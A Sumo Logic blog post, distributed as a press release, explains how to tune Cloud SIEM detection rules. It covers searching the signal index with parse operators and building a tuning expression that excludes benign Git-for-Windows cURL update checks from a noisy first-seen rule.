Sumo Logic Inc.

07/02/2024 | Press release | Distributed by Public on 07/02/2024 16:11

Rule tuning – supercharge Cloud SIEM for better alerts

We've seen the movies where the character needs to get out of a jam or needs to get somewhere in a hurry, so they mash the big button of Nitrous Oxide and boom they are off! Fast and the Furious and Boss Level are the two movies that come to mind. So, how does this relate to a SIEM or SIEM rules? Sit down, buckle up, and let's go for a ride.

Sumo Logic's Cloud SIEM runs on rules, whether they be the out-of-the-box (OOTB) rules that come with the product, or homegrown custom rules, the SIEM requires rules and events to function, detect, and provide value. What makes Cloud SIEM special in this regard is the connection with the Sumo Logic Platform. A SIEM with good rules is one thing, but it's a completely different beast to be able to perform deep analysis of the output of your SIEM on the same platform.

The OOTB rules in Cloud SIEM build in the best of a "one size fits all" model. But we know your organization is unique, which is why you'll want to make the most of customization and tuning for things like geographical locations, custom applications, vulnerability scanning, and other policy nuances that are very specific to each individual org.

Let's explore the tools available for customized rule tuning, namely the sec_signal index, search parse operators, rule tuning expressions, and how they can be used for data driven rule analysis and performance tuning. In addition, let's put these tools to work with a practical example of tuning out a particularly noisy false positive from our development team.

Utilizing the Sumo Logic Platform with SIEM data, we can boost the NOS for power tuning the SIEM. Let's dig in and put our historical SIEM detection analysis tools to work and drive SIEM performance to new levels. Because we'll be jumping into some advanced mechanics and detection outputs from Cloud SIEM, if you're not familiar with the data pipeline and terminology, you can always refer back to this introduction to Cloud SIEM for clarification.

Sumo Logic Log Search

SIEM detections are the best source for improvement opportunities for the detections themselves. The detections from Cloud SIEM (Signal) are indexed in the Sumo Logic Platform, providing an invaluable data source and historical record of detections in an environment.

The Signal Index

The Signals (detections) from Cloud SIEM are sent to the Sumo Logic Platform where they can be queried with Log Search, for simplicity we'll refer to this as search, and are accessible using the following search syntax:

_index=sec_signal

Intended for auditing Signal activity from Cloud SIEM, this data source is perfect for data driven understanding and tuning of detections. This index contains the Signals, and within each signal, metadata related to the Record and the Signal itself. We'll use fields from the Signal and the Record(s) for a more detailed understanding of behavior and to craft finely-tuned Rule Tuning Expressions. (For more info on Cloud SIEM Auditing, check out the Enterprise Audit app).

Auditing Signals gives us direct access to existing information to build tuning expressions from, given all of this information is stored within the Sumo Logic Platform, the following parse operators are easily applicable to SIEM record searches. Searching within the Records is true historical validation of your Tuning Expressions in a context where fine tuning can be tested and validated at scale, prior to SIEM Signal generation and tuning.

The Cloud SIEM Records Index

The Cloud SIEM pipeline processes raw logs into normalized records, these records are used by the SIEM and are also available in search.

Cloud SIEM has multiple types of Rules, all of which can generate Signals, though some Rules require more than one or many Records for correlation. The Signals in the sec_signal index above, have a single record for each Match Expression of the Rule in the fullRecords portion of the Signal. Search is the way to view all of the associated Records of a Signal.

Parse Operators Primer

An important primer on accessing fields in search, having multiple Parse Operators available, these are the ones we'll use here: Parse JSON, Parse Regex, and Dynamic Parsing - Copy Field Name; and with these operators, we will use the have to add the Parse multi function and Parse nodrop option to extract values from the Signal or Record to work with.

Parse JSON

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity

What this search does:

  • Searches the sec_signal index and extracts basic Entity fields

  • Using parse JSON extracts entity and entity_type fields from the entities field

  • Possible future searches for correlation on entity and entity_type

Signals are stored in JSON, using parse JSON gives us access to the fields nested within the Signal. Utilizing the field= functionality, we can access the elements nested within the fields, as demonstrated with Entity and Entity type above. Nodrop is a critical parse operator in Sumo Logic search, to the point we've added a section below to talk about it; in this example, every Signal will have an entity, so there is no need to add nodrop here.

Parse JSON arrays (with Nodrop)

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| json field=fullRecords "[*].metadata_product" as metadata_products nodrop
| json field=fullRecords "[*].metadata_vendor" as metadata_vendors nodrop
| count by metadata_vendors,metadata_products

What this search does (building on the previous search):

  • Creates two arrays for all metadata_products and metadata_vendors contained within the SIEM records in the Signals

  • Future correlation possibilities, like correlating Vendor and Products to Entities.

Parse JSON allows for parsing multiple values within a Signal, this is helpful for signals with multiple records stored, such as Threshold, Chain, etc. rules. For a single record or a specific record, using the [0].fieldName where the numeral 0 is the position within the array (0 being the first or only), allows for a single value to be parsed. The [*].fieldName parses all values from the JSON keys into an array specified, like as metadata_products line demonstrates above.

Note the use of nodrop within this search, Signals will have a vendor and product (see SIEM pipeline docs); however, for parsing multiple values of other fields (non-metadata fields), there may be cases where nodrop will save headaches exposing fields and conditions that may not have expected values.

Copy Field Name

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].parentBaseImage" as parentBaseImage
| %"fullRecords[0].baseImage" as baseImage
| %"fullRecords[0].commandLine" as commandLine

Copy Field Name is available through the Search UI by right clicking on the desired field and selecting "Copy Field Name", this looks like the %"fullRecords[0].parentBaseImage" example above. A limitation with this operation, the use of wildcards [*] is invalid, so only single fields within the Signal are accessible.

Personal preference and style is always a factor with search, the Entity and Entity_Type field parsing in the above examples are ideal candidates for Copy Field Name parsing; however, aesthetics wise parse JSON is my preference. The fields parentBaseImage, baseImage, and commandLine using this method will work, though will only parse a single Record field associated with this Signal.

Parse Regex (with JSON, Multi, and Nodrop)

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| json field=fullRecords "[*].metadata_product" as metadata_products nodrop
| json field=fullRecords "[*].metadata_vendor" as metadata_vendors nodrop
| parse regex field=metadata_products "\"(?[^\"]+)\"" multi nodrop
| parse regex field=metadata_vendors "\"(?[^\"]+)\"" multi nodrop
| count by metadata_vendor,metadata_product
| order by _count DESC

What this search does (building on the previous search):

  • Extraction of Vendor and Product values from the previously created array

  • Future correlation possibilities, like correlating Vendor and Products to Entities.

This example combines parse JSON to create arrays and parse Regex to parse the unique values from these arrays, allowing deeper access to the Record fields within the Signal. This is especially important with Chain Rules, as the Signals will contain two or more Records, depending on the Match Expressions within the rule.

Avoid pitfalls of not matching with Nodrop

Nodrop is an important operator deserving of callout by itself; from the docs"The nodrop option forces results to also include messages that don't match any segment of the parse expression." With multiple parse operators being used in a query, it is important to understand that nodrop will return results when used with all operators. Meaning, if a record is within scope of the query, but does not contain the parsed nodrop field, it will still be returned in the results, though the field will be treated as isBlank/isEmpty in the results (this is different from the field containing a "null" value).

Using nodrop allows for the aggregation of various fields across multiple records and signals, where each signal may not contain every parsed field, providing a broader view of aggregated Signal activity for a specific or unique entity. [Spoiler alert] Also useful in identifying a common field across records that can be used to effectively tune the rule to exclude or include only that specific field and value.

Choosing not to use nodrop on a parse operator will filter the intended results to only records that contain the parsed field, this is very useful primarily as a filter and to eliminate the presence of blank values in aggregate views of your data in search results.

The combination and use of these search operators allow the identification of important fields and values, especially for those values nested within the fullRecords part of a Signal, for understanding and fine tuning at an extremely granular level.

Rule tuning

Rule tuning expressions are a powerful feature, allowing users to extend a rule's match expression by appending additional match logic. This enables extending rules without having to duplicate an existing rule for customization, also missing out on possible future improvements from the Sumo Logic Threat Labs team; this feature is a key tool in customizing Sumo Logic's OOTB rules to individual organizations.

Getting expressive with Tuning Expressions

With great power, comes great responsibility; or something close enough with Tuning Expressions. As extensions to the match expression of rules, rule tuning expressions are powerful tools, with some added nuance.

To include or exclude

The selection of "include" or "exclude" for the tuning expression, with the default being "include", translates to appending the tuning expression after an "AND" (include) or an "AND NOT" (exclude).

The following examples demonstrate how the rule tuning expression include and exclude apply the AND and AND NOT to the match expression for the rules. These examples are only for demonstration purposes, if implemented without the additional rules required for modifying the impossible travel they will reduce important visibility.

Let's boost the functionality of our Impossible Travel rule (THRESHOLD-S00097) and explore two ways of excluding two known countries where the team authenticates from regularly with tuning expressions, and see how they come together in the resulting match expression in the Signal.

This is a copy of Sumo Logic's impossible travel successful rule, what does it detect:

  • Two successful authentications

  • From two different source IP countries

  • Within one hour

Note that no specific countries were specified in the rule logic, though at the bottom of the image there is a US CA exclusion, using the include tuning expression ("AND").

Include country exclusion (AND)

The include expression adds an AND (tuning expression).

What this expression does:

  • Includes an AND (NOT Source IP Country Codes from IN the specified array of countries)

What this looks like in a Signal's Match Expression:

  • AND (NOT srcDevice_ipCountryCode IN ("US","CA"))

Exclude country (NOT)

The exclude expression adds an AND (NOT (tuning expression))

From the Signal:

  • AND (NOT (srcDevice_ipCountryCode IN ("US","CA")))

Quick recap, using the include and exclude for our tuning expression, we removed two countries from our impossible travel rule - meaning the Impossible travel rule will no longer detect or create Signals from any authentications from the United States or Canada.

Brittleness and less is more

Detections and pattern matches can be brittle, meaning they can be too specific or exact with matches, so they fail when something as subtle as a single character is different. To complicate mitigating brittleness, there is also an issue of complexity which may introduce or compound brittleness.

Rules that utilize fields like commandLine from an endpoint or EndpointProcess event tap into rich data sources that allow for great detections. Commands can range from simple short words, whoami, to verbose scripts or multiple commands that include URLs. As the variety and complexity of the field is highly variable, it is easy to look at a few signals and make a tuning expression that seems to work, and does in some cases, but does not in all the needed cases.

With the help of Search and reviewing the record fields in Signals, we can explore an example of complexity, and find ways to mitigate brittleness.

Use Case: First Seen cURL repeated detection on the same URL

First Seen cURL execution from user (FIRST-S00040) detects the first time a user executes a unique commandLine with a process name (baseImage) containing lower cased "curl". Cloud SIEM builds a per Entity baseline of seven days for every user (user_username) in the environment observed using cURL and will alert on new values for the commandLine after that period of time.

We have looked at our Signals from this rule and see there is a Windows system with Git installed repeatedly checking the GitHub API for updates.

How can we take this signal and build a tuning expression to exclude this trusted traffic?

A seemingly easy way is to take the commandLine expression from the Signal, and use it as a tuning expression for the rule.

Here's why this is a deceptive trap!

  • The First Seen Rule looks for new values for a specific field, in this case commandLine, if the commandLine is extracted from an existing Signal, this value has already been seen.
    • The commandLine is a previously seen unique value, the retention period comes into play, and will not alert until retention expires.

    • The expression would prevent a signal in the event the retention period expires for this commandLine.

Outcome: Tuning Expression, albeit technically accurate, would fail for our intended use case of tuning out this update check.

Using search to validate and understand

Let's go to search to find out what makes this commandLine unique and what is variable in comparison with other commands and Signals.

_index=sec_signal "FIRST-S00040" "git"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| count by commandLine

What this search does:

  • Scopes the search with the sec_signal index for signals containing the terms:
    • "FIRST-S00040", the rule id we are looking for

    • "git", the string of text in the command line

  • References the commandLine field name (using Copy Field Name)

  • Performs a count aggregation on the commandLine field for analysis

Here are a couple things learned from these results:

  • The uniqueness in the commandLine is introduced by the name of the text file written to Temp
    • Every run creates a new dynamically generated file name, making every execution unique

    • Copying a single commandLine will only exclude that execution, if ever seen again.

  • Bonus find: there is another legitimate Git update URL

Building a tuning expression for Git for Windows

What do we know?

  • A commandLine with known variations, but still predictable

  • Identified two Git URLs in the commands, that do not change

Validating what we know before tuning:

_index=sec_signal "FIRST-S00040" "git"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| where (toLowerCase(commandLine) matches "*git-for-windows*" OR toLowerCase(commandLine) matches "*gitforwindows*")
| count as total_count

What this search does:

  • Produces a singular Aggregate for total_count of Signals matching the specified command lines

Confirming this search yields the same number of results as the original "git-for-windows" search will validate the Tuning Expression.

What the results show:

  • Provides a reference number of signals that match our tuning expression logic
    • Command line containing "git-for-windows" or "gitforwindows"

  • With the aggregate showing a single number, spot checking the raw Signal is a good sanity check
    • Using Messages, a quick scan of the Signals can visually verify nothing has crept into our results

Measure twice, cut once! - Tools in the toolbox for validation

One small change to the above search lets you see the impact of this tuning expression retroactively - only the search is retroactive, the tuning expression is from the time it's applied to a rule and enabled going forward.

_index=sec_signal "FIRST-S00040"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| where ruleid matches "FIRST-S00040"
| if(toLowerCase(commandLine) matches "*git-for-windows*" OR toLowerCase(commandLine) matches "*gitforwindows*","Tuned Out","Non-Git") as git_tuning
| count by git_tuning

What this search does:

  • Building on the previous search, we use the IF operator to validate whether our tuning condition would have "tuned out" the Signal had it been applied earlier
    • Moving from a "where" condition to an "if" condition does not restrict the results to where they match on the specified command lines, but creates a new field "git_tuning" that we can use as a label

What we learn from the results:

  • The tuning expression will tune out a large number of the false positive signals

Applying the tuning expression

Navigate in Cloud SIEM to Content, Rule Tuning

Use the "Create" button to create a new expression.

This is the "GitForWindows cURL" expression created to tune out our Git related false positives.

  • Rule ID applied = FIRST-S00040

  • Exclude the expression:
    • (lower(commandLine) matches "*git-for-windows*) OR lower(commandLine) matches "*gitforwindows*")

Observing the change

In Cloud SIEM, using the Signals page provides an excellent means for validating that the freshly applied tuning expression is working (high volume Signals make this easier). A quick Signal filter helps to validate in the SIEM our tuning expression is functioning as intended.

Of the multiple ways to get to the Signals page so the filtering can be done, these are two that have been the easiest:

The Rule page:

  • At the bottom of each Rules page shows "View all … Signals"

  • Clicking on this takes us to the Signals page and applies the following filter
    • RuleID is "FIRST-S00040" and suppressed is false

  • This will take you to the Signals view with the Rule Id already specified

  • Following the steps in the next section will implement the filter to the Signals view

Through the Signals

  • Similar to the above method, going to the Signals portion of SIEM will allow you to filter the search
    • Filtering uses Tab completion, entering the following allows you to filter the Signals
      • Rule Id is FIRST-S00040 (Already done if you came from the signals count link)

      • Remove the suppressed is false filter

      • Created time past 30 minutes

Monitoring for Signals created is straightforward with this view, seeing reduction in Signal creation from high volume to low or no volume is easy to watch here. When it comes to Rule Tuning with Signals that are a little more voluminous, using favorite fields (starred fields) or going into an individual Signal to spot check, will provide validation that the Tuning Expression has been successfully implemented. Another means, with validation, is to use the keyword string match in the filter, keyword = "git", to look for all Signals from the specified Rule within the time window.

Diving deeper with audit events:

Remember - with great power, comes great responsibility! Tuning Expressions can be applied to all rules - this may occasionally be ideal, but understand the implications of a Tuning Expression going awry, as a simple mistake can prevent all Signal generation, blinding the SIEM.

_index=sumologic_audit_events "RuleTuningExpressionCreated"
| values(%"ruleTuningExpression.ruleIds") as rule_ids by eventTime,%"operator.email",%"ruleTuningExpression.name"

What this Search does:

  • Scopes the query to RuleTuningExpressionCreated events within the sumologic_audit_events index

  • Aggregates the Event Time of the creation, the user's email address, and the name of the Tuning Expression, and shows all the rule_ids the expression was applied to

Further exploration in the sumologic_audit_events index is highly recommended.

  • Another eventName that is useful for Rule Tuning Expression audits is "RuleTuningExpressionUpdated"

Final thoughts

The process above is designed for iteration, identify and most importantly validate tuning opportunities - the balancing act of detection opportunities and over-tuning takes effort - in order to work through a Rule or a set of Signals. As we gain more experience with rule tuning, we understand the underlying data and how it can be applied to improve the process. This process leads directly to reducing the amount of noise, analyst toil, false positives, and continue to clearly showcase the value of Cloud SIEM in your environment.

You now understand the data lifecycle in Cloud SIEM, specifically about the sec_signal index that allows for auditing of SIEM detections and how to use Search Parse Operators to unlock the power of unique values for performance tuning. Using these tools, you can now remove a false positive from a noisy rule, freeing up analyst resources to more effectively work on more important alerts.

SIEM tuning is an exercise in iteration, working through the data from the SIEM to refine detections and reduce noise, freeing up the analysts to focus and find those important True Positives. Performance tuning is as straightforward as finding a Rule or Signal, working through the detections, gathering the data, testing it against historical data, and implementing the change. Utilization is as close by as a Search and a curiosity on what can be improved.

Happy Hunting and boosting your SIEM!

Learn how Roku approaches rule tuning for improved situational awareness.

Complete visibility for DevSecOps

Reduce downtime and move from reactive to proactive monitoring.